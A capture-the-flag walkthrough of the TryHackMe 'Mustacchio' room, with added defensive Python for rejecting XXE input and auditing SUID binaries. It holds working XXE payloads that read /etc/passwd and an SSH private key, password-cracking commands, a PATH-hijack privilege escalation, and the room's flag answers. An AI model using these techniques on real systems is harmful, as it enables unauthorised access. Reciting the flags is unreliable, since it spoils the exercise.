
Overview

This is a walkthrough of the TryHackMe room "Mustacchio".

Task 1

Q1. What is the user flag?

Hint. Check the source of the page

Run a port scan.

$ nmap -Pn -sC -sV -A -T4 -p- 10.10.67.61 -oN nmap_result
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
|   256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_  256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
| http-robots.txt: 1 disallowed entry 
|_/
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The open ports are now known.

Port   Service   Version
22     ssh       OpenSSH 7.2p2
80     http      Apache/2.4.18
8765   http      nginx 1.10.3

A website is reachable on port 80.

home page.png

Enumerate directories.

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://10.10.67.61/FUZZ -recursion -recursion-depth 1 -ic -c -o ffuf_result
                        [Status: 200, Size: 1752, Words: 77, Lines: 73, Duration: 240ms]
images                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 239ms]
[INFO] Adding a new job to the queue: http://10.10.67.61/images/FUZZ

custom                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 239ms]
[INFO] Adding a new job to the queue: http://10.10.67.61/custom/FUZZ

[INFO] Starting queued job on target: http://10.10.67.61/images/FUZZ

                        [Status: 200, Size: 6166, Words: 308, Lines: 42, Duration: 243ms]
icons                   [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 241ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.67.61/images/icons/
[INFO] Starting queued job on target: http://10.10.67.61/custom/FUZZ

                        [Status: 200, Size: 1114, Words: 76, Lines: 18, Duration: 243ms]
css                     [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 242ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.67.61/custom/css/
js                      [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 241ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.67.61/custom/js/
:: Progress: [141695/141695] :: Job [3/3] :: 27 req/sec :: Duration: [0:14:53] :: Errors: 0 ::

Browsing to /custom/js revealed a users.bak file.

custom js.png

After downloading it and inspecting the data, I found an admin user and a password hash.

users back.png

I cracked the password with John the Ripper and recovered it.

$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldog19        (?)     
1g 0:00:00:00 DONE (2024-07-05 03:58) 14.28g/s 9773Kp/s 9773Kc/s 9773KC/s bulldog27..bullcrap1
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.

Accessing port 8765 showed the login form of an admin panel.

admin panel.png

Logging in as admin:bulldog19 succeeded.

dashboard.png

Submitting the form empty produced an alert saying that XML code must be entered into this form.

alert.png

Also, looking at the page source, it appeared that an SSH login would be possible if I had the SSH key of the Barry account.

comment.png

Sending a test payload confirmed that XXE injection works.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY name SYSTEM "file:///etc/passwd" >]>
<test>
  <name>&name;</name>
</test>

xxe inj.png

Retrieve the private key from /home/barry/.ssh/id_rsa.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY name SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<test>
  <name>&name;</name>
</test>

ssh private.png
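The two payloads above work because the server-side parser resolves the external entity and places the file contents into the response. As an added example (not code from the room or from the original article), the following Python function shows the fix on the application side: it parses client-supplied XML with the standard-library expat parser but rejects any DOCTYPE, entity declaration or external entity reference before anything is expanded, which also blocks internal-entity expansion attacks. The form in the room only needs the `<test><name>` structure, so refusing DTDs costs nothing; the sample documents and the `accepted` helper are constructed here for illustration.

```python
"""Refuse DTD/entity constructs in client-supplied XML before the parser expands anything."""
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when a document carries a DOCTYPE, entity declaration or external reference."""


def parse_untrusted_xml(xml_text: str) -> dict:
    """Parse XML from an untrusted source and return {leaf element name: text}.

    Any DOCTYPE is rejected outright: a form that only needs <test><name>...</name></test>
    never needs a DTD, and rejecting it stops external entities (XXE) and internal
    entity expansion (billion laughs) before the parser can act on them.
    """
    parser = expat.ParserCreate()
    texts = {}            # element name -> chunks of character data
    open_elements = []    # stack of currently open element names

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE not allowed (root {name!r})")

    def reject_entity(*decl):
        # Defence in depth: fires for entity declarations even if a DOCTYPE slipped through.
        raise UnsafeXML("entity declaration not allowed")

    def reject_external(context, base, system_id, public_id):
        raise UnsafeXML(f"external entity reference not allowed: {system_id!r}")

    def start(name, attrs):
        open_elements.append(name)
        texts.setdefault(name, [])

    def chars(data):
        if open_elements:
            texts[open_elements[-1]].append(data)

    def end(name):
        open_elements.pop()

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end

    try:
        parser.Parse(xml_text.encode("utf-8"), True)
    except expat.ExpatError as exc:
        raise UnsafeXML(f"malformed XML: {exc}") from exc

    # Keep only elements that carried non-whitespace text (the leaf values).
    return {name: "".join(parts).strip()
            for name, parts in texts.items() if "".join(parts).strip()}


def accepted(xml_text: str) -> bool:
    """True if the document parses under the rules above, False if it is rejected."""
    try:
        parse_untrusted_xml(xml_text)
        return True
    except UnsafeXML:
        return False


# Constructed benign submission in the shape the form expects.
SAFE_DOC = """<?xml version="1.0" encoding="UTF-8"?>
<test>
  <name>barry</name>
</test>
"""

# The external-entity payload shown in the walkthrough above.
XXE_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY name SYSTEM "file:///etc/passwd" >]>
<test>
  <name>&name;</name>
</test>
"""

# Constructed internal-entity document; rejected by the same DOCTYPE check.
INTERNAL_ENTITY_DOC = '<!DOCTYPE test [<!ENTITY a "x">]><test><name>&a;</name></test>'


if __name__ == "__main__":
    print(parse_untrusted_xml(SAFE_DOC))   # {'name': 'barry'}
    for doc in (XXE_PAYLOAD, INTERNAL_ENTITY_DOC):
        print("accepted" if accepted(doc) else "rejected")
```

The same three handlers are what hardened wrappers such as defusedxml install; if the application uses another XML library, look for its equivalent switches (disabling entity resolution and DTD loading) rather than filtering the input text with string matching.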

Save it locally after fixing the formatting.

$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E

jqDJP+blUr+xMlASYB9t4gFyMl9VugHQJAylGZE6J/b1nG57eGYOM8wdZvVMGrfN 
(omitted)
7mxN/N5LlosTefJnlhdIhIDTDMsEwjACA+q686+bREd+drajgk6R9eKgSME7geVD
-----END RSA PRIVATE KEY-----

Convert it to a hash file with ssh2john.

$ ssh2john id_rsa > id_hash.txt

I cracked the passphrase with John the Ripper.

$ john id_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
urieljames       (id_rsa)     
1g 0:00:00:00 DONE (2024-07-05 05:52) 1.075g/s 3194Kp/s 3194Kc/s 3194KC/s urieljr.k..urielito1000
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Connect over SSH.

$ ssh -i id_rsa barry@10.10.67.61
barry@mustacchio:~$

Obtain the user flag from /home/barry/user.txt.

user.txt
62d77a4d5f97d47c5aa38b3b2651b831

A. 62d77a4d5f97d47c5aa38b3b2651b831

Q2. What is the root flag?

Hint. SUID?

Searching for SUID binaries turned up /home/joe/live_log.

$ find / -user root -perm -4000 2>/dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/gpasswd
/home/joe/live_log
/bin/ping
/bin/ping6
/bin/umount
/bin/mount
/bin/fusermount
/bin/su

From the strings inside the binary and its output when run, I could tell that it executes tail -f /var/log/nginx/access.log to read the access log of port 8765.

$ strings /home/joe/live_log
(omitted)
tail -f /var/log/nginx/access.log
$ ./live_log 
10.6.55.144 - - [05/Jul/2024:09:34:53 +0000] "GET /assets/Security%20Guide1101986381457 HTTP/1.1" 404 152 "-" "Fuzz Faster U Fool v2.1.0-dev"
10.6.55.144 - - [05/Jul/2024:09:34:53 +0000] "GET /assets/image0171101986756817 HTTP/1.1" 404 152 "-" "Fuzz Faster U Fool v2.1.0-dev"
10.6.55.144 - - [05/Jul/2024:11:35:25 +0000] "GET /assets/test HTTP/1.1" 404 152 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"

Replacing the tail command with something like bash should give a shell.

$ cd /tmp
$ echo "/bin/bash" > tail
$ chmod 777 tail
$ export PATH=/tmp:$PATH

Running /home/joe/live_log gave a root shell.

$ /home/joe/live_log 
root@mustacchio:/tmp# whoami
root
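The escalation above relies on two things a defender can audit for: a root-owned SUID binary living in a home directory, and that binary invoking a command by bare name so it is resolved through the caller's PATH. The following Python script is an added example, not code from the room or the original article; it takes a `find` listing like the one above and a binary's `strings` output and flags both conditions. The sample inputs are constructed (the SUID list is an abbreviated copy of the listing above, the strings output is a plausible sketch), and the expected-directory allowlist is an assumption for a stock Ubuntu layout.

```python
"""Audit a SUID listing and a binary's strings output for the two weaknesses used above."""
import shlex

# Assumption: on a stock Ubuntu system, root-owned SUID binaries live under these prefixes.
# Anything else (home directories, /tmp, /opt) deserves a closer look.
EXPECTED_SUID_DIRS = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/bin/", "/sbin/")


def unexpected_suid(listing: str) -> list:
    """Return SUID paths from a `find / -perm -4000` listing that sit outside the usual dirs."""
    flagged = []
    for line in listing.splitlines():
        path = line.strip()
        if not path.startswith("/"):
            continue                      # skip prompts and command echoes
        if not path.startswith(EXPECTED_SUID_DIRS):
            flagged.append(path)
    return flagged


def hijackable_commands(strings_output: str) -> list:
    """Return program names from command lines in `strings` output that are not absolute paths.

    A SUID binary that hands "tail -f ..." to system() or popen() lets the shell resolve
    `tail` through PATH, so whoever runs it controls which binary executes as root.
    Heuristic: a bare alphanumeric word followed by an option or an absolute path.
    """
    found = []
    for line in strings_output.splitlines():
        try:
            argv = shlex.split(line)
        except ValueError:
            continue                      # unbalanced quotes: not a command line
        if len(argv) < 2:
            continue
        prog, first_arg = argv[0], argv[1]
        looks_like_cmd = first_arg.startswith("-") or first_arg.startswith("/")
        if "/" not in prog and prog.isalnum() and looks_like_cmd:
            found.append(prog)
    return found


# Constructed sample: abbreviated copy of the find(1) listing from the box.
SUID_LISTING = """\
$ find / -user root -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/sudo
/home/joe/live_log
/bin/ping
/bin/su
"""

# Constructed sketch of strings(1) output for a small SUID log-reader wrapper.
STRINGS_OUTPUT = """\
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
.text
"""

# Same wrapper with the command fixed to an absolute path: no longer flagged.
HARDENED_STRINGS_OUTPUT = "/usr/bin/tail -f /var/log/nginx/access.log\n"


if __name__ == "__main__":
    print("unexpected SUID:", unexpected_suid(SUID_LISTING))        # ['/home/joe/live_log']
    print("PATH-resolved commands:", hijackable_commands(STRINGS_OUTPUT))  # ['tail']
    print("after hardening:", hijackable_commands(HARDENED_STRINGS_OUTPUT))  # []
```

Using an absolute path removes the PATH lookup, but the better fix is not to have a SUID wrapper at all: the log could be made readable by a dedicated group, or the wrapper could execve the command with a fixed environment and drop to an unprivileged user before reading.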

Obtain the flag from /root/root.txt.

/root/root.txt
3223581420d906c4dd1a5f9b530393a5

A. 3223581420d906c4dd1a5f9b530393a5
